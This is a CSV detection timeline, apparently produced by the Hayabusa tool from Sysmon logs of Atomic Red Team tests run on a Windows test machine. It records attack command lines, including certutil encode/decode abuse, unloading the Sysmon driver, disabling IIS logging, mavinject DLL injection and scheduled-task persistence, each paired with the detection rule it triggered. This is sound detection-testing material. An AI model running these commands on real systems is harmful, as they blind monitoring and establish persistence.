2019-07-19 23:57:02.895 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:02.977 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4832 | PGUID: 747F3D96-DA3F-5D31-0000-00104C173C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -encode c:\file.exe file.txt | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | LID: 0x50951 | PID: 1260 | PGUID: 747F3D96-DA3F-5D31-0000-00109E193C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4020 | PGUID: 747F3D96-DA3F-5D31-0000-0010562E3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -decode file.txt c:\file.exe | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-DA3F-5D31-0000-001022323C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DA3F-5D31-0000-0010813E3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6572 | PGUID: 747F3D96-DA40-5D31-0000-00106A543C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp"" | LID: 0x50951 | PID: 5168 | PGUID: 747F3D96-DA40-5D31-0000-0010B1553C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-DA40-5D31-0000-0010CF5A3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-DA40-5D31-0000-0010565D3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00 | Hash: SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4",rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.600 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DA40-5D31-0000-0010E16B3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3976 | PGUID: 747F3D96-DA4A-5D31-0000-0010C21F3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1012 | PGUID: 747F3D96-DA4A-5D31-0000-0010EE223D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4056 | PGUID: 747F3D96-DA4A-5D31-0000-00106C293D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2584 | PGUID: 747F3D96-DA4A-5D31-0000-00107A2C3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll | Process: C:\Windows\System32\mavinject.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2604 | PGUID: 747F3D96-DA4B-5D31-0000-0010CB413D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,,MavInject Process Injection,,rules/sigma/process_creation/proc_creation_win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-DA4C-5D31-0000-0010655D3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-DA4C-5D31-0000-001077603D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-DA68-5D31-0000-001025713E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DA6A-5D31-0000-0010B2953E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management AT | Cmd: at 13:20 /interactive cmd | Process: C:\Windows\System32\at.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | LID: 0x50951 | PID: 3864 | PGUID: 747F3D96-DA6A-5D31-0000-001004983E00 | Hash: SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,PrivEsc,Interactive AT Job,,rules/sigma/process_creation/proc_creation_win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3224 | PGUID: 747F3D96-DA6A-5D31-0000-0010C09D3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4276 | PGUID: 747F3D96-DA6A-5D31-0000-001072A63E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | LID: 0x50951 | PID: 1408 | PGUID: 747F3D96-DA6A-5D31-0000-0010C4A83E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.608 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\spawn | Process: C:\Windows\system32\svchost.exe | PID: 1108 | PGUID: 747F3D96-D4A5-5D31-0000-001037D40000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4552 | PGUID: 747F3D96-DA6A-5D31-0000-001025AD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-DA6A-5D31-0000-001074C23E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-DA6A-5D31-0000-0010C5C43E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-DA6A-5D31-0000-00104BC83E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5332 | PGUID: 747F3D96-DA6B-5D31-0000-0010CCD03E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a -c | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-DA6B-5D31-0000-00102DD33E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3316 | PGUID: 747F3D96-DA6E-5D31-0000-0010D8F63E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a Java | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | LID: 0x50951 | PID: 1284 | PGUID: 747F3D96-DA6E-5D31-0000-001081F93E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-DA70-5D31-0000-001007293F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a C:\Windows\system32\javacpl.cpl | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-DA70-5D31-0000-00100E2C3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6168 | PGUID: 747F3D96-DA71-5D31-0000-00101A463F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
